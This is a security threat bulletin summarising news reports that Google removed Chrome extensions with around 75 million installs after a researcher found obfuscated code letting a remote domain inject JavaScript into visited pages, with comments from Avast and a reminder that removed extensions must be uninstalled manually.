Malicious Chrome Extensions With 75M Installs Removed From Web Store

Cyber Security Threat Summary:
“Google has removed from the Chrome Web Store 32 malicious extensions that could alter search results and push spam or unwanted ads. Collectively, they come with a download count of 75 million. The extensions featured legitimate functionality to keep users unaware of the malicious behavior that came in obfuscated code to deliver the payloads. Cybersecurity researcher Wladimir Palant analyzed the PDF Toolbox extension (2 million downloads) available from Chrome Web Store and found that it included code that was disguised as a legitimate extension API wrapper. In a write-up in mid-May, the researcher explains that the code allowed the “serasearchtop[.]com” domain to inject arbitrary JavaScript code into any website the user visited. The potential for abuse ranges from inserting ads into webpages to stealing sensitive information. However, Palant didn’t observe any malicious activity, so the code’s purpose remained unclear. The researcher also noticed that the code was set to activate 24 hours after installing the extension, a behavior that is typically associated with malicious intentions. A few days ago, Palant published a follow-up post on the case to alert that he had discovered the same suspicious code in another 18 Chrome extensions with a total download count of 55 million” (Bleeping Computer, 2023).

Below is a list of some of the malicious extensions uncovered by Palant:

  • Autoskip for Youtube – 9 million active users
  • Soundboost – 6.9 million active users
  • Crystal Ad block – 6.8 million active users
  • Brisk VPN – 5.6 million active users
  • Clipboard Helper – 3.5 million active users
  • Maxi Refresher – 3.5 million active users
According to Palant, all of these extensions were still available for download in the Chrome Web Store at the time of Palant publishing the second post, despite him reporting the extensions to Google.

“Continuing his investigation, Palant found two variants of the code: one masquerading as Mozilla’s WebExtension browser API Polyfill, and another posing as the Day.js library. However, both versions featured the same arbitrary JS code injection mechanism involving serasearchtop[.]com. Although the researcher did not observe any clear malicious activity, he noted that there are numerous user reports and reviews on the Web Store indicating that the extensions were performing redirections and search result hijacking” (Bleeping Computer, 2023).

Security Officer Comments:
Today Avast released a follow-up blog post in response to Palant’s findings, stating that the company reported the malicious extensions to Google. At the time of writing, Avast noted that it uncovered 32 extensions that were still available on the Chrome Web Store, meaning that the additional 50 extensions had already been taken down. Interestingly enough, Avast says that the “75 million installs” highlighted by Palant in his report seem to have been inflated as the “number of people who encountered the threat isn’t proportional to the number of installs from the Chrome Web Store.”

Suggested Correction(s):
“Responding to a request for comment from BleepingComputer before Avast published its findings, a Google spokesperson said that the ‘reported extensions have been removed from the Chrome Web Store.’ Users should note that the removal of the extensions from the Chrome Web Store does not automatically deactivate or uninstall them from their browsers, so manual action is required to eliminate the risk” (Bleeping Computer, 2023).

Link(s):
https://www.bleepingcomputer.com/